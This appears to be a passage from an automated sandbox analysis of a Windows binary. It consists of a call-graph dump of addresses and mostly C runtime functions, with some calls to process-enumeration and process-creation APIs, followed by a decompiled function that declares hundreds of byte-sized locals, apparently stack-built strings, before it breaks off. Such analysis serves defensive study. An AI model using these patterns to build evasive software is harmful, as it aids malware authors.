type_info::_name_internal_method 17842->17844 17843->17844 17844->17645 17851 7ff87c101510 17845->17851 17848 7ff87c102e60 17861 7ff87c1014e0 17848->17861 17854 7ff87c101df0 17851->17854 17853 7ff87c101537 17853->17848 17855 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17854->17855 17856 7ff87c101e17 type_info::_name_internal_method 17855->17856 17857 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17856->17857 17858 7ff87c101e5b type_info::_name_internal_method 17856->17858 17857->17858 17859 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17858->17859 17860 7ff87c101e8c Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17858->17860 17859->17860 17860->17853 17862 7ff87c1014f8 char_traits 17861->17862 17865 7ff87c101ce0 17862->17865 17864 7ff87c10150a 17864->17650 17866 7ff87c101d02 type_info::_name_internal_method 17865->17866 17867 7ff87c101d09 Concurrency::details::ContextBase::GetWorkQueueIdentity 17866->17867 17869 7ff87c101d3a type_info::_name_internal_method 17866->17869 17868 7ff87c101df0 type_info::_name_internal_method 49 API calls 17867->17868 17873 7ff87c101d35 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17868->17873 17870 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17869->17870 17871 7ff87c101d65 type_info::_name_internal_method 17869->17871 17870->17871 17872 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17871->17872 17871->17873 17872->17873 17873->17864 17875 7ff87c102ab2 17874->17875 17882 7ff87c102d40 17875->17882 17879 7ff87c101f18 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method char_traits 17878->17879 17880 7ff87c101910 type_info::_name_internal_method 47 API calls 17879->17880 17881 7ff87c102016 17880->17881 17881->17658 17883 7ff87c102d6d 17882->17883 17884 7ff87c102d74 type_info::_name_internal_method 17883->17884 17887 7ff87c102dc1 type_info::_name_internal_method 17883->17887 17885 7ff87c102450 49 API calls 17884->17885 17886 7ff87c102af4 17885->17886 17886->17658 17889 7ff87c102fc0 17887->17889 17890 7ff87c102fea type_info::_name_internal_method 17889->17890 17891 7ff87c102ff1 Concurrency::details::ContextBase::GetWorkQueueIdentity 17890->17891 17892 7ff87c10303c 17890->17892 17900 7ff87c103240 17891->17900 17893 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17892->17893 17895 7ff87c10304b type_info::_name_internal_method 17893->17895 17896 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17895->17896 17897 7ff87c1030aa Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17895->17897 17896->17897 17898 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17897->17898 17899 7ff87c103037 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17897->17899 17898->17899 17899->17886 17901 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17900->17901 17902 7ff87c103270 17901->17902 17903 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17902->17903 17904 7ff87c103285 type_info::_name_internal_method 17903->17904 17905 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17904->17905 17906 7ff87c103315 type_info::_name_internal_method 17904->17906 17905->17906 17907 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17906->17907 17908 7ff87c10338e Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17906->17908 17907->17908 17908->17899 17910 7ff87c1091e8 17909->17910 17917 7ff87c10893c 17910->17917 17913 7ff87c10923c 17915 7ff87c109251 17913->17915 17916 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17913->17916 17914 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17914->17913 17915->17605 17916->17915 17918 7ff87c108947 17917->17918 17919 7ff87c108975 17918->17919 17920 7ff87c108987 17918->17920 17921 7ff87c10b420 _set_errno_from_matherr 11 API calls 17919->17921 17923 7ff87c108995 17920->17923 17927 7ff87c1089d1 17920->17927 17922 7ff87c10897a 17921->17922 17935 7ff87c109744 17922->17935 17925 7ff87c108985 17923->17925 17926 7ff87c109674 _invalid_parameter_noinfo_noreturn 47 API calls 17923->17926 17925->17913 17925->17914 17926->17925 17928 7ff87c108d5d 17927->17928 17930 7ff87c10b420 _set_errno_from_matherr 11 API calls 17927->17930 17928->17925 17929 7ff87c10b420 _set_errno_from_matherr 11 API calls 17928->17929 17931 7ff87c108ffd 17929->17931 17932 7ff87c108d52 17930->17932 17933 7ff87c109744 _invalid_parameter_noinfo 47 API calls 17931->17933 17934 7ff87c109744 _invalid_parameter_noinfo 47 API calls 17932->17934 17933->17925 17934->17928 17936 7ff87c1095d8 _invalid_parameter_noinfo_noreturn 47 API calls 17935->17936 17937 7ff87c10975d 17936->17937 17937->17925 17941 7ff87c11a250 17938->17941 17940 7ff87c119f51 17940->17612 17944 7ff87c11acc0 17941->17944 17943 7ff87c11a261 17943->17940 17947 7ff87c11b560 17944->17947 17946 7ff87c11acd1 17946->17943 17950 7ff87c11bc70 17947->17950 17949 7ff87c11b571 17949->17946 17953 7ff87c11c580 17950->17953 17952 7ff87c11bc81 17952->17949 17956 7ff87c11cf10 17953->17956 17955 7ff87c11c591 17955->17952 17959 7ff87c11d890 17956->17959 17958 7ff87c11cf21 17958->17955 17960 7ff87c11e020 8 API calls 17959->17960 17961 7ff87c11d8a1 17960->17961 17961->17958 17963 7ff87c103d77 new 17962->17963 17964 7ff87c103da2 17963->17964 17965 7ff87c1097ec new 2 API calls 17963->17965 17968 7ff87c10472c 17963->17968 17972 7ff87c10470c 17963->17972 17964->17624 17965->17963 17969 7ff87c10473a std::bad_alloc::bad_alloc 17968->17969 17970 7ff87c106e00 _CxxThrowException 2 API calls 17969->17970 17971 7ff87c10474b 17970->17971 17971->17963 17973 7ff87c10471a std::bad_alloc::bad_alloc 17972->17973 17974 7ff87c106e00 _CxxThrowException 2 API calls 17973->17974 17975 7ff87c10472b 17974->17975 17977 7ff87c103d12 RtlLookupFunctionEntry 17976->17977 17978 7ff87c103b2e 17977->17978 17979 7ff87c103d28 RtlVirtualUnwind 17977->17979 17980 7ff87c103ad0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17978->17980 17979->17977 17979->17978 18337 18000be34 18340 180005db4 18337->18340 18339 18000bf4c 18341 180005df9 18340->18341 18342 1800060dd Process32FirstW 18341->18342 18343 180005e61 18341->18343 18342->18341 18343->18339 18344 7ff87c103de4 18345 7ff87c103ded __scrt_acquire_startup_lock 18344->18345 18347 7ff87c103df1 __isa_available_init 18345->18347 18348 7ff87c109ee0 18345->18348 18349 7ff87c109f00 18348->18349 18350 7ff87c109f17 18348->18350 18351 7ff87c109f08 18349->18351 18352 7ff87c109f1e 18349->18352 18350->18347 18354 7ff87c10b420 _set_errno_from_matherr 11 API calls 18351->18354 18353 7ff87c10d24c 67 API calls 18352->18353 18355 7ff87c109f23 18353->18355 18356 7ff87c109f0d 18354->18356 18380 7ff87c10c930 GetModuleFileNameW 18355->18380 18358 7ff87c109744 _invalid_parameter_noinfo 47 API calls 18356->18358 18358->18350 18364 7ff87c109fad 18366 7ff87c109cc0 47 API calls 18364->18366 18365 7ff87c109f95 18367 7ff87c10b420 _set_errno_from_matherr 11 API calls 18365->18367 18373 7ff87c109fc9 18366->18373 18368 7ff87c109f9a 18367->18368 18370 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18368->18370 18369 7ff87c109fcf 18372 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18369->18372 18371 7ff87c109fa8 18370->18371 18371->18350 18372->18350 18373->18369 18374 7ff87c109ffb 18373->18374 18375 7ff87c10a014 18373->18375 18376 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18374->18376 18378 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18375->18378 18377 7ff87c10a004 18376->18377 18379 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18377->18379 18378->18369 18379->18371 18381 7ff87c10c989 18380->18381 18382 7ff87c10c975 GetLastError 18380->18382 18384 7ff87c10b2b0 47 API calls 18381->18384 18404 7ff87c10b394 18382->18404 18385 7ff87c10c9b7 18384->18385 18386 7ff87c10c9c8 18385->18386 18409 7ff87c10db08 18385->18409 18412 7ff87c10c814 18386->18412 18387 7ff87c103a70 _UnwindNestedFrames 8 API calls 18390 7ff87c109f3a 18387->18390 18392 7ff87c109cc0 18390->18392 18391 7ff87c10c982 18391->18387 18394 7ff87c109cfe 18392->18394 18396 7ff87c109d64 18394->18396 18426 7ff87c10d5fc 18394->18426 18395 7ff87c109e53 18398 7ff87c109e80 18395->18398 18396->18395 18397 7ff87c10d5fc 47 API calls 18396->18397 18397->18396 18399 7ff87c109e98 18398->18399 18403 7ff87c109ed0 18398->18403 18400 7ff87c10aad0 __vcrt_getptd_noexit 11 API calls 18399->18400 18399->18403 18401 7ff87c109ec6 18400->18401 18402 7ff87c10a9dc Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18401->18402 18402->18403 18403->18364 18403->18365 18405 7ff87c10ba4c _set_errno_from_matherr 11 API calls 18404->18405 18406 7ff87c10b3a1 Concurrency::details::SchedulerProxy::DeleteThis 18405->18406 18407 7ff87c10ba4c _set_errno_from_matherr 11 API calls 18406->18407 18408 7ff87c10b3c3 18407->18408 18408->18391 18410 7ff87c10d8f0 5 API calls 18409->18410 18411 7ff87c10db28 18410->18411 18411->18386 18413 7ff87c10c853 18412->18413 18415 7ff87c10c838 18412->18415 18414 7ff87c10c858 18413->18414 18416 7ff87c10d698 WideCharToMultiByte 18413->18416 18414->18415 18418 7ff87c10b420 _set_errno_from_matherr 11 API calls 18414->18418 18415->18391 18417 7ff87c10c8af 18416->18417 18417->18414 18419 7ff87c10c8b6 GetLastError 18417->18419 18420 7ff87c10c8e1 18417->18420 18418->18415 18421 7ff87c10b394 11 API calls 18419->18421 18422 7ff87c10d698 WideCharToMultiByte 18420->18422 18423 7ff87c10c8c3 18421->18423 18424 7ff87c10c908 18422->18424 18425 7ff87c10b420 _set_errno_from_matherr 11 API calls 18423->18425 18424->18415 18424->18419 18425->18415 18427 7ff87c10d588 18426->18427 18428 7ff87c10b2b0 47 API calls 18427->18428 18429 7ff87c10d5ac 18428->18429 18429->18394 18430 7ff87c113f70 18433 7ff87c119600 18430->18433 18432 7ff87c113f97 ExitProcess 18434 7ff87c119758 18433->18434 18434->18432 18435 18000741c 18436 18000745d 18435->18436 18439 1800284b0 18436->18439 18438 1800075fe 18441 180028554 18439->18441 18440 180028653 CreateProcessW 18440->18438 18441->18440

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 25%
                                                                                                      			E00007FF87FF87C113FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                      				signed int _v24;
                                                                                                      				char _v29;
                                                                                                      				char _v30;
                                                                                                      				char _v31;
                                                                                                      				char _v32;
                                                                                                      				char _v33;
                                                                                                      				char _v34;
                                                                                                      				char _v35;
                                                                                                      				char _v36;
                                                                                                      				char _v37;
                                                                                                      				char _v38;
                                                                                                      				char _v39;
                                                                                                      				char _v40;
                                                                                                      				char _v41;
                                                                                                      				char _v42;
                                                                                                      				char _v43;
                                                                                                      				char _v44;
                                                                                                      				char _v45;
                                                                                                      				char _v46;
                                                                                                      				char _v47;
                                                                                                      				char _v48;
                                                                                                      				char _v49;
                                                                                                      				char _v50;
                                                                                                      				char _v51;
                                                                                                      				char _v52;
                                                                                                      				char _v53;
                                                                                                      				char _v54;
                                                                                                      				char _v55;
                                                                                                      				char _v56;
                                                                                                      				char _v57;
                                                                                                      				char _v58;
                                                                                                      				char _v59;
                                                                                                      				char _v60;
                                                                                                      				char _v61;
                                                                                                      				char _v62;
                                                                                                      				char _v63;
                                                                                                      				char _v64;
                                                                                                      				char _v65;
                                                                                                      				char _v66;
                                                                                                      				char _v67;
                                                                                                      				char _v68;
                                                                                                      				char _v69;
                                                                                                      				char _v70;
                                                                                                      				char _v71;
                                                                                                      				char _v72;
                                                                                                      				char _v73;
                                                                                                      				char _v74;
                                                                                                      				char _v75;
                                                                                                      				char _v76;
                                                                                                      				char _v77;
                                                                                                      				char _v78;
                                                                                                      				char _v79;
                                                                                                      				char _v80;
                                                                                                      				char _v81;
                                                                                                      				char _v82;
                                                                                                      				char _v83;
                                                                                                      				char _v84;
                                                                                                      				char _v85;
                                                                                                      				char _v86;
                                                                                                      				char _v87;
                                                                                                      				char _v88;
                                                                                                      				char _v89;
                                                                                                      				char _v90;
                                                                                                      				char _v91;
                                                                                                      				char _v92;
                                                                                                      				char _v93;
                                                                                                      				char _v94;
                                                                                                      				char _v95;
                                                                                                      				char _v96;
                                                                                                      				char _v97;
                                                                                                      				char _v98;
                                                                                                      				char _v99;
                                                                                                      				char _v100;
                                                                                                      				char _v101;
                                                                                                      				char _v102;
                                                                                                      				char _v103;
                                                                                                      				char _v104;
                                                                                                      				char _v105;
                                                                                                      				char _v106;
                                                                                                      				char _v107;
                                                                                                      				char _v108;
                                                                                                      				char _v109;
                                                                                                      				char _v110;
                                                                                                      				char _v111;
                                                                                                      				char _v112;
                                                                                                      				char _v113;
                                                                                                      				char _v114;
                                                                                                      				char _v115;
                                                                                                      				char _v116;
                                                                                                      				char _v117;
                                                                                                      				char _v118;
                                                                                                      				char _v119;
                                                                                                      				char _v120;
                                                                                                      				char _v121;
                                                                                                      				char _v122;
                                                                                                      				char _v123;
                                                                                                      				char _v124;
                                                                                                      				char _v125;
                                                                                                      				char _v126;
                                                                                                      				char _v127;
                                                                                                      				char _v128;
                                                                                                      				char _v129;
                                                                                                      				char _v130;
                                                                                                      				char _v131;
                                                                                                      				char _v132;
                                                                                                      				char _v133;
                                                                                                      				char _v134;
                                                                                                      				char _v135;
                                                                                                      				char _v136;
                                                                                                      				char _v137;
                                                                                                      				char _v138;
                                                                                                      				char _v139;
                                                                                                      				char _v140;
                                                                                                      				char _v141;
                                                                                                      				char _v142;
                                                                                                      				char _v143;
                                                                                                      				char _v144;
                                                                                                      				char _v145;
                                                                                                      				char _v146;
                                                                                                      				char _v147;
                                                                                                      				char _v148;
                                                                                                      				char _v149;
                                                                                                      				char _v150;
                                                                                                      				char _v151;
                                                                                                      				char _v152;
                                                                                                      				char _v153;
                                                                                                      				char _v154;
                                                                                                      				char _v155;
                                                                                                      				char _v156;
                                                                                                      				char _v157;
                                                                                                      				char _v158;
                                                                                                      				char _v159;
                                                                                                      				char _v160;
                                                                                                      				char _v161;
                                                                                                      				char _v162;
                                                                                                      				char _v163;
                                                                                                      				char _v164;
                                                                                                      				char _v165;
                                                                                                      				char _v166;
                                                                                                      				char _v167;
                                                                                                      				char _v168;
                                                                                                      				char _v169;
                                                                                                      				char _v170;
                                                                                                      				char _v171;
                                                                                                      				char _v172;
                                                                                                      				char _v173;
                                                                                                      				char _v174;
                                                                                                      				char _v175;
                                                                                                      				char _v176;
                                                                                                      				char _v177;
                                                                                                      				char _v178;
                                                                                                      				char _v179;
                                                                                                      				char _v180;
                                                                                                      				char _v181;
                                                                                                      				char _v182;
                                                                                                      				char _v183;
                                                                                                      				char _v184;
                                                                                                      				char _v185;
                                                                                                      				char _v186;
                                                                                                      				char _v187;
                                                                                                      				char _v188;
                                                                                                      				char _v189;
                                                                                                      				char _v190;
                                                                                                      				char _v191;
                                                                                                      				char _v192;
                                                                                                      				char _v193;
                                                                                                      				char _v194;
                                                                                                      				char _v195;
                                                                                                      				char _v196;
                                                                                                      				char _v197;
                                                                                                      				char _v198;
                                                                                                      				char _v199;
                                                                                                      				char _v200;
                                                                                                      				char _v201;
                                                                                                      				char _v202;
                                                                                                      				char _v203;
                                                                                                      				char _v204;
                                                                                                      				char _v205;
                                                                                                      				char _v206;
                                                                                                      				char _v207;
                                                                                                      				char _v208;
                                                                                                      				char _v209;
                                                                                                      				char _v210;
                                                                                                      				char _v211;
                                                                                                      				char _v212;
                                                                                                      				char _v213;
                                                                                                      				char _v214;
                                                                                                      				char _v215;
                                                                                                      				char _v216;
                                                                                                      				char _v217;
                                                                                                      				char _v218;
                                                                                                      				char _v219;
                                                                                                      				char _v220;
                                                                                                      				char _v221;
                                                                                                      				char _v222;
                                                                                                      				char _v223;
                                                                                                      				char _v224;
                                                                                                      				char _v225;
                                                                                                      				char _v226;
                                                                                                      				char _v227;
                                                                                                      				char _v228;
                                                                                                      				char _v229;
                                                                                                      				char _v230;
                                                                                                      				char _v231;
                                                                                                      				char _v232;
                                                                                                      				char _v233;
                                                                                                      				char _v234;
                                                                                                      				char _v235;
                                                                                                      				char _v236;
                                                                                                      				char _v237;
                                                                                                      				char _v238;
                                                                                                      				char _v239;
                                                                                                      				char _v240;
                                                                                                      				char _v241;
                                                                                                      				char _v242;
                                                                                                      				char _v243;
                                                                                                      				char _v244;
                                                                                                      				char _v245;
                                                                                                      				char _v246;
                                                                                                      				char _v247;
                                                                                                      				char _v248;
                                                                                                      				char _v249;
                                                                                                      				char _v250;
                                                                                                      				char _v251;
                                                                                                      				char _v252;
                                                                                                      				char _v253;
                                                                                                      				char _v254;
                                                                                                      				char _v255;
                                                                                                      				char _v256;
                                                                                                      				char _v257;
                                                                                                      				char _v258;
                                                                                                      				char _v259;
                                                                                                      				char _v260;
                                                                                                      				char _v261;
                                                                                                      				char _v262;
                                                                                                      				char _v263;
                                                                                                      				char _v264;
                                                                                                      				char _v265;
                                                                                                      				char _v266;
                                                                                                      				char _v267;
                                                                                                      				char _v268;
                                                                                                      				char _v269;
                                                                                                      				char _v270;
                                                                                                      				char _v271;
                                                                                                      				char _v272;
                                                                                                      				char _v273;
                                                                                                      				char _v274;
                                                                                                      				char _v275;
                                                                                                      				char _v276;
                                                                                                      				char _v277;
                                                                                                      				char _v278;
                                                                                                      				char _v279;
                                                                                                      				char _v280;
                                                                                                      				char _v281;
                                                                                                      				char _v282;
                                                                                                      				char _v283;
                                                                                                      				char _v284;
                                                                                                      				char _v285;
                                                                                                      				char _v286;
                                                                                                      				char _v287;
                                                                                                      				char _v288;
                                                                                                      				char _v289;
                                                                                                      				char _v290;
                                                                                                      				char _v291;
                                                                                                      				char _v292;
                                                                                                      				char _v293;
                                                                                                      				char _v294;
                                                                                                      				char _v295;
                                                                                                      				char _v296;
                                                                                                      				char _v297;
                                                                                                      				char _v298;
                                                                                                      				char _v299;
                                                                                                      				char _v300;
                                                                                                      				char _v301;
                                                                                                      				char _v302;
                                                                                                      				char _v303;
                                                                                                      				char _v304;
                                                                                                      				char _v305;
                                                                                                      				char _v306;
                                                                                                      				char _v307;
                                                                                                      				char _v308;
                                                                                                      				char _v309;
                                                                                                      				char _v310;
                                                                                                      				char _v311;
                                                                                                      				char _v312;
                                                                                                      				char _v313;
                                                                                                      				char _v314;
                                                                                                      				char _v315;
                                                                                                      				char _v316;
                                                                                                      				char _v317;
                                                                                                      				char _v318;
                                                                                                      				char _v319;
                                                                                                      				char _v320;
                                                                                                      				char _v321;
                                                                                                      				char _v322;
                                                                                                      				char _v323;
                                                                                                      				char _v324;
                                                                                                      				char _v325;
                                                                                                      				char _v326;
                                                                                                      				char _v327;
                                                                                                      				char _v328;
                                                                                                      				char _v329;
                                                                                                      				char _v330;
                                                                                                      				char _v331;
                                                                                                      				char _v332;
                                                                                                      				char _v333;
                                                                                                      				char _v334;
                                                                                                      				char _v335;
                                                                                                      				char _v336;
                                                                                                      				char _v337;
                                                                                                      				char _v338;
                                                                                                      				char _v339;
                                                                                                      				char _v340;
                                                                                                      				char _v341;
                                                                                                      				char _v342;
                                                                                                      				char _v343;
                                                                                                      				char _v344;
                                                                                                      				char _v345;
                                                                                                      				char _v346;
                                                                                                      				char _v347;
                                                                                                      				char _v348;
                                                                                                      				char _v349;
                                                                                                      				char _v350;
                                                                                                      				char _v351;
                                                                                                      				char _v352;
                                                                                                      				char _v353;
                                                                                                      				char _v354;
                                                                                                      				char _v355;
                                                                                                      				char _v356;
                                                                                                      				char _v357;
                                                                                                      				char _v358;
                                                                                                      				char _v359;
                                                                                                      				char _v360;
                                                                                                      				char _v361;
                                                                                                      				char _v362;
                                                                                                      				char _v363;
                                                                                                      				char _v364;
                                                                                                      				char _v365;
                                                                                                      				char _v366;
                                                                                                      				char _v367;
                                                                                                      				char _v368;
                                                                                                      				char _v369;
                                                                                                      				char _v370;
                                                                                                      				char _v371;
                                                                                                      				char _v372;
                                                                                                      				char _v373;
                                                                                                      				char _v374;
                                                                                                      				char _v375;
                                                                                                      				char _v376;
                                                                                                      				char _v377;
                                                                                                      				char _v378;
                                                                                                      				char _v379;
                                                                                                      				char _v380;
                                                                                                      				char _v381;
                                                                                                      				char _v382;
                                                                                                      				char _v383;
                                                                                                      				char _v384;
                                                                                                      				char _v385;
                                                                                                      				char _v386;
                                                                                                      				char _v387;
                                                                                                      				char _v388;
                                                                                                      				char _v389;
                                                                                                      				char _v390;
                                                                                                      				char _v391;
                                                                                                      				char _v392;
                                                                                                      				char _v393;
                                                                                                      				char _v394;
                                                                                                      				char _v395;
                                                                                                      				char _v396;
                                                                                                      				char _v397;
                                                                                                      				char _v398;
                                                                                                      				char _v399;
                                                                                                      				char _v400;
                                                                                                      				char _v401;
                                                                                                      				char _v402;
                                                                                                      				char _v403;
                                                                                                      				char _v404;
                                                                                                      				char _v405;
                                                                                                      				char _v406;
                                                                                                      				char _v407;
                                                                                                      				char _v408;
                                                                                                      				char _v409;
                                                                                                      				char _v410;
                                                                                                      				char _v411;
                                                                                                      				char _v412;
                                                                                                      				char _v413;
                                                                                                      				char _v414;
                                                                                                      				char _v415;
                                                                                                      				char _v416;
                                                                                                      				char _v417;
                                                                                                      				char _v418;
                                                                                                      				char _v419;
                                                                                                      				char _v420;
                                                                                                      				char _v421;
                                                                                                      				char _v422;
                                                                                                      				char _v423;
                                                                                                      				char _v424;
                                                                                                      				char _v425;
                                                                                                      				char _v426;
                                                                                                      				char _v427;
                                                                                                      				char _v428;
                                                                                                      				char _v429;
                                                                                                      				char _v430;
                                                                                                      				char _v431;
                                                                                                      				char _v432;
                                                                                                      				char _v433;
                                                                                                      				char _v434;
                                                                                                      				char _v435;
                                                                                                      				char _v436;
                                                                                                      				char _v437;
                                                                                                      				char _v438;
                                                                                                      				char _v439;
                                                                                                      				char _v440;
                                                                                                      				char _v441;
                                                                                                      				char _v442;
                                                                                                      				char _v443;
                                                                                                      				char _v444;
                                                                                                      				char _v445;
                                                                                                      				char _v446;
                                                                                                      				char _v447;
                                                                                                      				char _v448;
                                                                                                      				char _v449;
                                                                                                      				char _v450;
                                                                                                      				char _v451;
                                                                                                      				char _v452;
                                                                                                      				char _v453;
                                                                                                      				char _v454;
                                                                                                      				char _v455;
                                                                                                      				char _v456;
                                                                                                      				char _v457;
                                                                                                      				char _v458;
                                                                                                      				char _v459;
                                                                                                      				char _v460;
                                                                                                      				char _v461;
                                                                                                      				char _v462;
                                                                                                      				char _v463;
                                                                                                      				char _v464;
                                                                                                      				char _v465;
                                                                                                      				char _v466;
                                                                                                      				char _v467;
                                                                                                      				char _v468;
                                                                                                      				char _v469;
                                                                                                      				char _v470;
                                                                                                      				char _v471;
                                                                                                      				char _v472;
                                                                                                      				char _v473;
                                                                                                      				char _v474;
                                                                                                      				char _v475;
                                                                                                      				char _v476;
                                                                                                      				char _v477;
                                                                                                      				char _v478;
                                                                                                      				char _v479;
                                                                                                      				char _v480;
                                                                                                      				char _v481;
                                                                                                      				char _v482;
                                                                                                      				char _v483;
                                                                                                      				char _v484;
                                                                                                      				char _v485;
                                                                                                      				char _v486;
                                                                                                      				char _v487;
                                                                                                      				char _v488;
                                                                                                      				char _v489;
                                                                                                      				char _v490;
                                                                                                      				char _v491;
                                                                                                      				char _v492;
                                                                                                      				char _v493;
                                                                                                      				char _v494;
                                                                                                      				char _v495;
                                                                                                      				char _v496;
                                                                                                      				char _v497;
                                                                                                      				char _v498;
                                                                                                      				char _v499;
                                                                                                      				char _v500;
                                                                                                      				char _v501;
                                                                                                      				char _v502;
                                                                                                      				char _v503;
                                                                                                      				char _v504;
                                                                                                      				char _v505;
                                                                                                      				char _v506;
                                                                                                      				char _v507;
                                                                                                      				char _v508;
                                                                                                      				char _v509;
                                                                                                      				char _v510;
                                                                                                      				char _v511;
                                                                                                      				char _v512;
                                                                                                      				char _v513;
                                                                                                      				char _v514;
                                                                                                      				char _v515;
                                                                                                      				char _v516;
                                                                                                      				char _v517;
                                                                                                      				char _v518;
                                                                                                      				char _v519;
                                                                                                      				char _v520;
                                                                                                      				char _v521;
                                                                                                      				char _v522;
                                                                                                      				char _v523;
                                                                                                      				char _v524;
                                                                                                      				char _v525;
                                                                                                      				char _v526;
                                                                                                      				char _v527;
                                                                                                      				char _v528;
                                                                                                      				char _v529;
                                                                                                      				char _v530;
                                                                                                      				char _v531;
                                                                                                      				char _v532;
                                                                                                      				char _v533;
                                                                                                      				char _v534;
                                                                                                      				char _v535;
                                                                                                      				char _v536;
                                                                                                      				char _v537;
                                                                                                      				char _v538;
                                                                                                      				char _v539;
                                                                                                      				char _v540;
                                                                                                      				char _v541;
                                                                                                      				char _v542;
                                                                                                      				char _v543;
                                                                                                      				char _v544;
                                                                                                      				char _v545;
                                                                                                      				char _v546;
                                                                                                      				char _v547;
                                                                                                      				char _v548;
                                                                                                      				char _v549;
                                                                                                      				char _v550;
                                                                                                      				char _v551;
                                                                                                      				char _v552;
                                                                                                      				char _v553;
                                                                                                      				char _v554;
                                                                                                      				char _v555;
                                                                                                      				char _v556;
                                                                                                      				char _v557;
                                                                                                      				char _v558;
                                                                                                      				char _v559;
                                                                                                      				char _v560;
                                                                                                      				char _v561;
                                                                                                      				char _v562;
                                                                                                      				char _v563;
                                                                                                      				char _v564;
                                                                                                      				char _v565;
                                                                                                      				char _v566;
                                                                                                      				char _v567;
                                                                                                      				char _v568;
                                                                                                      				char _v569;
                                                                                                      				char _v570;
                                                                                                      				char _v571;
                                                                                                      				char _v572;
                                                                                                      				char _v573;
                                                                                                      				char _v574;
                                                                                                      				char _v575;
                                                                                                      				char _v576;
                                                                                                      				char _v577;
                                                                                                      				char _v578;
                                                                                                      				char _v579;
                                                                                                      				char _v580;
                                                                                                      				char _v581;
                                                                                                      				char _v582;
                                                                                                      				char _v583;
                                                                                                      				char _v584;
                                                                                                      				char _v585;
                                                                                                      				char _v586;
                                                                                                      				char _v587;
                                                                                                      				char _v588;
                                                                                                      				char _v589;
                                                                                                      				char _v590;
                                                                                                      				char _v591;
                                                                                                      				char _v592;
                                                                                                      				char _v593;
                                                                                                      				char _v594;
                                                                                                      				char _v595;
                                                                                                      				char _v596;
                                                                                                      				char _v597;
                                                                                                      				char _v598;
                                                                                                      				char _v599;
                                                                                                      				char _v600;
                                                                                                      				char _v601;
                                                                                                      				char _v602;
                                                                                                      				char _v603;
                                                                                                      				char _v604;
                                                                                                      				char _v605;
                                                                                                      				char _v606;
                                                                                                      				char _v607;
                                                                                                      				char _v608;
                                                                                                      				char _v609;
                                                                                                      				char _v610;
                                                                                                      				char _v611;
                                                                                                      				char _v612;
                                                                                                      				char _v613;
                                                                                                      				char _v614;
                                                                                                      				char _v615;
                                                                                                      				char _v616;
                                                                                                      				char _v617;
                                                                                                      				char _v618;
                                                                                                      				char _v619;
                                                                                                      				char _v620;
                                                                                                      				char _v621;
                                                                                                      				char _v622;
                                                                                                      				char _v623;
                                                                                                      				char _v624;
                                                                                                      				char _v625;
                                                                                                      				char _v626;
                                                                                                      				char _v627;
                                                                                                      				char _v628;
                                                                                                      				char _v629;
                                                                                                      				char _v630;
                                                                                                      				char _v631;
                                                                                                      				char _v632;
                                                                                                      				char _v633;
                                                                                                      				char _v634;
                                                                                                      				char _v635;
                                                                                                      				char _v636;
                                                                                                      				char _v637;
                                                                                                      				char _v638;
                                                                                                      				char _v639;
                                                                                                      				char _v640;
                                                                                                      				char _v641;
                                                                                                      				char _v642;
                                                                                                      				char _v643;
                                                                                                      				char _v644;
                                                                                                      				char _v645;
                                                                                                      				char _v646;
                                                                                                      				char _v647;
                                                                                                      				char _v648;
                                                                                                      				char _v649;
                                                                                                      				char _v650;
                                                                                                      				char _v651;
                                                                                                      				char _v652;
                                                                                                      				char _v653;
                                                                                                      				char _v654;
                                                                                                      				char _v655;
                                                                                                      				char _v656;
                                                                                                      				char _v657;
                                                                                                      				char _v658;
                                                                                                      				char _v659;
                                                                                                      				char _v660;
                                                                                                      				char _v661;
                                                                                                      				char _v662;
                                                                                                      				char _v663;
                                                                                                      				char _v664;
                                                                                                      				char _v665;
                                                                                                      				char _v666;
                                                                                                      				char _v667;
                                                                                                      				char _v668;
                                                                                                      				char _v669;
                                                                                                      				char _v670;
                                                                                                      				char _v671;
                                                                                                      				char _v672;
                                                                                                      				char _v673;
                                                                                                      				char _v674;
                                                                                                      				char _v675;
                                                                                                      				char _v676;
                                                                                                      				char _v677;
                                                                                                      				char _v678;
                                                                                                      				char _v679;
                                                                                                      				char _v680;
                                                                                                      				char _v681;
                                                                                                      				char _v682;
                                                                                                      				char _v683;
                                                                                                      				char _v684;
                                                                                                      				char _v685;
                                                                                                      				char _v686;
                                                                                                      				char _v687;
                                                                                                      				char _v688;
                                                                                                      				char _v689;
                                                                                                      				char _v690;
                                                                                                      				char _v691;
                                                                                                      				char _v692;
                                                                                                      				char _v693;
                                                                                                      				char _v694;
                                                                                                      				char _v695;
                                                                                                      				char _v696;
                                                                                                      				char _v697;
                                                                                                      				char _v698;
                                                                                                      				char _v699;
